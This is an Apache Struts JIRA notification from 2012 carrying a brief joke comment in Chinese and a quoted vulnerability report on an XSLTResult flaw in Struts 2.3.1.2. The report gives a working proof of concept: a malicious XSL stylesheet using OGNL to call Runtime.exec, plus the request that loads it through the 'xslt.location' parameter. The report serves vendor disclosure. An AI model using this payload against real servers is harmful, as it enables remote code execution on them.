You are viewing a plain text version of this content. The canonical link for it is here.
Posted to issues@struts.apache.org by "zhouyanming (Commented) (JIRA)" <ji...@apache.org> on 2012/03/22 04:20:04 UTC
[jira] [Commented] (WW-3782) struts2框架XSLTResult本地文件代码执行漏洞

    [ https://issues.apache.org/jira/browse/WW-3782?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13235302#comment-13235302 ] 

zhouyanming commented on WW-3782:
---------------------------------

哥们太搞了,天朝还没占领全世界
                
> struts2框架XSLTResult本地文件代码执行漏洞
> -----------------------------
>
>                 Key: WW-3782
>                 URL: https://issues.apache.org/jira/browse/WW-3782
>             Project: Struts 2
>          Issue Type: Bug
>          Components: Core Actions
>    Affects Versions: 2.3.1.2
>            Reporter: kxlzx
>            Priority: Critical
>              Labels: patch
>         Attachments: struts.jpg
>
>
> http://www.inbreak.net/archives/319
> Reporter : kxlzx , Alibaba Security Team
> http://www.inbreak.net/
> struts2允许action有多种返回类型，其中包括XSLT类型，这种类型允许接受用户提交一个文件地址，并且去解析它为XSLT文件，无论扩展名是什么。
>  这是XSLTResult文件代码：
> http://svn.apache.org/repos/asf/struts/struts2/trunk/core/src/main/java/org/apache/struts2/views/xslt/XSLTResult.java
> //获取用户提交的"xslt.location"的值
> String pathFromRequest = ServletActionContext.getRequest().getParameter("xslt.location");
> path = pathFromRequest;
> URL resource = ServletActionContext.getServletContext().getResource(path);
> //解析用户提交的文件地址为xslt
> templates = factory.newTemplates(new StreamSource(resource.openStream()));
> 而XSLT解析，会允许执行java静态方法，所以，只要上传一个文件在服务器上，例如
>  /upload/7758521.gif
> <?xml version="1.0" encoding="UTF-8" ?>
> <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
> 		 version="1.0" xmlns:ognl="ognl.Ognl">
> 	<xsl:template match="/">
> 		<html> 
> 			<body> 
> 			   <h2>hacked by kxlzx</h2> 
> 			   <h2>http://www.inbreak.net</h2> 
> 			   <exp>
> 					 <xsl:value-of select="ognl:getValue('@Runtime@getRuntime().exec(&quot;calc&quot;)', '')"/>
> 				</exp>
> 			</body> 
> 		</html> 
> 	</xsl:template> 
> </xsl:stylesheet>
> 这个xsl文件解析时，会调用ognl中的
> ognl:getValue('@Runtime@getRuntime().exec("calc")', '')
> 导致执行任意代码。
> 假设一个xslt的返回action地址为
>  
> http://www.inbreak.net/xslt.action
>  
> 我们就可以提交
>  
> http://www.inbreak.net/xslt.action?xslt.location=upload/a.gif
> 就会变成
> !https://issues.apache.org/jira/secure/attachment/12519392/struts.jpg!

--
This message is automatically generated by JIRA.
If you think it was sent incorrectly, please contact your JIRA administrators: https://issues.apache.org/jira/secure/ContactAdministrators!default.jspa
For more information on JIRA, see: http://www.atlassian.com/software/jira